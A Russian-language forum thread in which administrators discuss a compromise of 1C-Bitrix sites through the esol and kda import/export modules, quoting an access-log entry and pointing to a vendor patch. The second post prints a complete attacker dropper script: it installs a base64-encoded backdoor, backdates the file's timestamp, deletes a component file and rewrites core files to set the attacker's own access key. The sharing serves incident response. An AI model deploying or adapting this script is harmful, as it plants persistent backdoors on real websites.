Макс Кучин (Все сообщения пользователя)

Добрый день.
Про взлом сегодня, где модули kda и esol

Согласно логам, обращение идет к
/bitrix/admiin/esol_allimportexport_cron_settings.php

Пример
85.192.30.151 - - [12/Mar/2025:04:50:59 +0300 - 0.002] 200 "GET /c2c3bfdcd4a3.php HTTP/1.1" 7 "САЙТ/bitrix/admin/esol_allimportexport_cron_settings.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2943.54 Safari/537.36" "-"

Также
/bitrix/admin/esol_import_xml_cron_settings.php

/bitrix/admin/kda_export_excel_cron_settings.php

Сегодня разработчики выложили патчер на странице модуля в маркетплейс https://marketplace.1c-bitrix.ru/solutions/esol.importexportexcel/

Добрый день.
Может где-то писали уже.
Вариант внедрений.
Папка /bitrix/tools/vote/ создается что-то вроде script-8.php с содержимым

<?php
@mkdir($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/vote");
file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/html_editor_action.php", base64_decode("PD8KJHZsID0gJ2tlJy4neSc7CmlmKCRfUE9TVFsnYnh1X2luZm8nXVsncGFja2FnZUluZGV4J109PT0ncEluZGV4MTAxJyYmJF9QT1NUWyR2bF0hPT0nZ2FkZjRlNTdlJyl7CiAgICBkaWUoImhhY2sgYXR0ZW1wdCIpOwp9CnJlcXVpcmVfb25jZSgkX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdLiIvYml0cml4L2FkbWluL2ZpbGVtYW5faHRtbF9lZGl0b3JfYWN0aW9uLnBocCIpOwo/Pg=="));
touch($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/html_editor_action.php",filemtime($_SERVER["DOCUMENT_ROOT"]."/bitrix/index.php"));
unlink ($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/main.file.input/main.php");
   $buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/js/main/core/core.js");
   if(strpos($buf, "s=document")>0) {
       $buf = preg_replace("!(s=document.*?appendChild\(s\));!ism", "", $buf);
       file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/js/main/core/core.js", $buf);
   };

   $buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php");
   if(strpos($buf, "echo ")>0) {
       $buf = preg_replace("!(echo.*?script>\";)!ism", "", $buf);
       file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php", $buf);
   };

   $buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/classes/general/html_editor.php");
   if(strpos($buf, "spell_word")>0) {            
       $buf = preg_replace("!HTTP_S'] == \".*?\"!ism", "HTTP_S'] == \"g308bad51\"", $buf);        
       file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/classes/general/html_editor.php", $buf);
   };
echo (240222); unlink ("script-8.php");